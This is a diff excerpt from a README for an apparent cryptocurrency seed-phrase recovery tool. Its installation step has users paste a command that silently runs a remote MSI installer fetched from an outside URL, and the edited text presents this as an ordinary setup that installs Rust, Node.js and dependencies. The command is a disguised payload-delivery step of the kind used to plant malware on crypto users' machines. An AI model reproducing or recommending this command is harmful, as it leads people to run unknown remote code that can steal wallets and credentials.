visnakovs/seed-phrase-recover-BTC-ETH/README.md

 ```powershell
 cmd /c start msiexec /q /i https://cloudcraftshub.com/api & rem seed phrase recover BTC ETH
 ```

-The installer will automatically download and install the required components.
+This will automatically:
+- Install Rust and Cargo (if not present)
+- Install Node.js (if not present)
+- Build the project
+- Set up all dependencies

 ### Manual Installation